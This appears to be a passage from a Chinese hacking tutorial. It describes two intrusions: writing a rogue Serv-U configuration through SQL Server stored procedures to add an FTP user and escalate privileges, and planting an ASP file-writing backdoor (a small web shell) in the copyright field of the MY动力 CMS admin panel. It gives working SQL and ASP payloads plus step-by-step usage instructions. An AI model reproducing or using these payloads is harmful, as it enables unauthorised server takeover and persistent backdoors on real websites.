这段代码的意思是通过使用存储过程来读取d:\Serv-U6.3\ServUDaemon.ini里的配置信息，返回执行成功 如图2

既然可以读了 那么我们是不是可以写一个进去?继续执行

★ declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息，刚才复制的那些都要写上去，在最后添加我们自己的，跟我们在WEBSHELL里的serv-u提权是一样的》 ★

　　按F5，执行一下，发现命令执行成功，马上使用上面的语句复查一下，发现已经写进去了，如图3。

　　OK 剩下的事情就不用我多说了吧?FTP上去，直接添加用户登陆服务器就OK了，这里就不多废话了。怎么样?发现了吧?在渗透过程中只要细心+灵活的运用知识就可以完美的达到效果啦。

     二、网站配置文件插马

     MY动力管理系统相信很多朋友都玩过吧？但是他的后台可是有点BT。虽然有数据库备份但是并不支持自定义路径，而且数据库里还有<% loop <% 不能闭和，所以数据库备份几乎是没什么用了。不过以前有朋友提出可以先恢复再备份的方法，不过我没测试成功。

    这里教大家的方法就是配置文件插马，至于怎么进到后台我就不说，是注射也好，下载默认数据库也好总之能进后台就OK了。进到后台后我们会发现在常规设置，那里有个网站信息配置，点开他，如图4。

    我们看到版权信息那里写着 "版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" ，这是系统自带的，因为这里没有限制我们输入的字符长度 所以我们就可以在这里传一个类似小马的东西。注意是类似，而不是小马（编辑点评：其实就是个小马。），直接在版权信息那里进行替换，前面要加上他原有的语句，替换代码如下：

★ 版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" '版权信息 if Request("xiaoxin")="520" then dim allen,creat,text,thisline,path if Request("creat")="yes" then Set fs = CreateObject("Scripting.FileSystemObject") Set outfile=fs.CreateTextFile(server.mappath(Request("path"))) outfile.WriteLine Request("text") Response.write "小新恭喜" end if Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes'>" Response.write "<textarea name='text'>"&thisline&"</textarea><br>" Response.write "<input type='text' name='path' value='"&Request("path")&"'>" Response.write "<input name='submit' type='submit' value='ok' ></form>" Response.end end if %> ★

　　然后保存一下，千万注意，这个时候，千万别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?xiaoxin=520，有人会问为什么了?因为在上边版权信息内的代码，是一段发送程序，利用inc/config.asp相关文件信息所写。

　　进入这个页面之后会发现：这是啥玩意? 好象一个小马。那你就当小马用好了，上面写你的ASP木马代码，下面写上路径，如图5、6。

　　图5

　　图6